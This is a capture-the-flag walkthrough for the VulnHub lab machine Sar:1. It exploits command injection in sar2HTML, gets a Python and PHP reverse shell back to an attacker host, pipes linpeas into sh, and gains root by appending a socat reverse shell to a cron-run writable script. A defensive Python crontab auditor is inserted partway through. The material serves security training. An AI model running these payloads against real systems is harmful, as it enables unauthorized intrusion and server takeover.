https://www.vulnhub.com/entry/sar-1,425/
Discover Target Networks
sudo nmap -sn 192.168.122.1-255
sudo nmap -p- 192.168.122.207
Port 80
- Run
dirb http://192.168.122.207
and find http://192.168.122.207/phpinfo.php
- Visit
http://192.168.122.207/robots.txt
and find http://192.168.122.207/sar2HTML/
sar2HTML
- Version 3.2.1 of sar2HTML is vulnerable to remote code execution through a parameter in a plain GET request: https://www.exploit-db.com/exploits/47204
Reverse Shell
- Any command appended after
http://192.168.122.207/sar2HTML/index.php?plot=;
is executed by the server. Reverse shell one-liners to try can be taken from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Python
- Check whether Python exists on the machine:
http://192.168.122.207/sar2HTML/index.php?plot=;which python3
- Then run
ncat -nvlp 4444
on the attacker's machine and visit http://192.168.122.207/sar2HTML/index.php?plot=;python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.122.101",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
; now we have a reverse shell.
PHP
- Get a copy of the PHP reverse shell script into the current directory:
cp /usr/share/webshells/php/php-reverse-shell.php .
and change the ip and port in it to the attacker's.
- Start a simple HTTP server on the attacker using Python 3:
python -m http.server 8888
- Download the PHP script onto the target machine by visiting
http://192.168.122.207/sar2HTML/index.php?plot=;wget http://192.168.122.101:8888/php-reverse-shell.php
or upload it.
- Start a listener on the attacker using
ncat -nvlp 7777
and visit http://192.168.122.207/sar2HTML/php-reverse-shell.php
; now we have a reverse shell.
Explore the target machine
- Get a better shell using Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
- List all users on the target machine with
cat /etc/passwd
; there is a real (non-system) user called love.
- Try running LinPeas.sh :
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
- LinPEAS shows a cron job that runs every 5 minutes as root:
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
- Running
cat /var/www/html/finally.sh
shows
#!/bin/sh
./write.sh
so it is a shell script that runs /var/www/html/write.sh. Opening write.sh, it is just a random shell script that creates a file in /tmp.
- Running
ls -l /var/www/html
to see the permissions and ownership of all the files, we can see that finally.sh is owned by root, so we can't modify it right now, but write.sh is owned by www-data, which is our current daemon user.
Privilege escalation
- From that cron job we know that write.sh will be executed by root every 5 minutes, so we can modify it to give us another reverse shell, and that one will run as root.
- We can't just use nano or vi in this limited shell, as the user www-data doesn't have a TTY, so we append the reverse shell command to the script instead:
echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.122.101:4444" >> write.sh
- Now open a listener on the attacker's machine and just wait for the next run of the cron job.
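The root cause here, a root cron job that ends up executing a script owned by www-data, is exactly what a defender should audit for. The following Python is an added example and not part of this writeup: it parses system crontab entries, follows the scripts each job runs (resolving ./ paths against the job's cd, as cron does), and reports any script that is not root-owned or is group/world writable. The crontab text, file ownership and file contents are constructed stand-ins for what the writeup observed on the box.

```python
import os
import re
# Constructed input: the system crontab entry the writeup found, plus a benign one.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
0 3 * * * root /usr/local/bin/backup.sh
"""
# Constructed stand-ins for os.stat()/open(), mirroring `ls -l /var/www/html` and `cat finally.sh`
# from the writeup: path -> (uid, mode) and path -> contents; www-data is uid 33 on Debian/Ubuntu.
SAMPLE_META = {"/var/www/html/finally.sh": (0, 0o755), "/var/www/html/write.sh": (33, 0o755), "/usr/local/bin/backup.sh": (0, 0o700)}
SAMPLE_BODY = {"/var/www/html/finally.sh": "#!/bin/sh\n./write.sh\n",
               "/var/www/html/write.sh": "#!/bin/sh\ntouch /tmp/$RANDOM\n",
               "/usr/local/bin/backup.sh": "#!/bin/sh\ntar czf /root/etc.tgz /etc\n"}

CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")  # 5 time fields, user, command
SCRIPT_TOKEN = re.compile(r"(?:\./|/)[\w./-]+\.sh\b")                    # ./x.sh or /abs/path/x.sh
CD_TOKEN = re.compile(r"\bcd\s+(\S+)")

def script_risk(path, meta):
    """Return why `path` could be altered by a non-root user, or None if it looks safe."""
    uid, mode = meta[path]
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & 0o022:  # group or world write bit set
        return f"group/world writable (mode {oct(mode)})"
    return None

def audit_crontab(text, meta=SAMPLE_META, body=SAMPLE_BODY):
    """List (cron_user, script, reason) for cron-run scripts, including ones they call, that non-root can modify."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line.strip())
        if line.lstrip().startswith("#") or not m:
            continue
        user, cmd = m.group("user"), m.group("cmd")
        cd = CD_TOKEN.search(cmd)
        cwd = cd.group(1) if cd else "/"  # relative paths resolve against the job's cd, as cron runs them
        resolve = lambda tokens: [os.path.normpath(os.path.join(cwd, t)) for t in tokens]
        seen, queue = set(), resolve(SCRIPT_TOKEN.findall(cmd))
        while queue:
            script = queue.pop()
            if script in seen or script not in meta:
                continue
            seen.add(script)
            reason = script_risk(script, meta)
            if reason:
                findings.append((user, script, reason))
            queue += resolve(SCRIPT_TOKEN.findall(body.get(script, "")))  # follow nested scripts
    return findings
```

On a live host, replace SAMPLE_META and SAMPLE_BODY with lookups built from os.stat() and open() over the entries in /etc/crontab and /etc/cron.d/*.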
Capture the flags
- Now that we are root, we can change the passwords, install openssh-server and start it, and then SSH into the machine instead.
- Run
cat /home/love/Desktop/user.txt
to get the user flag and
cat /root/root.txt
to get the root flag.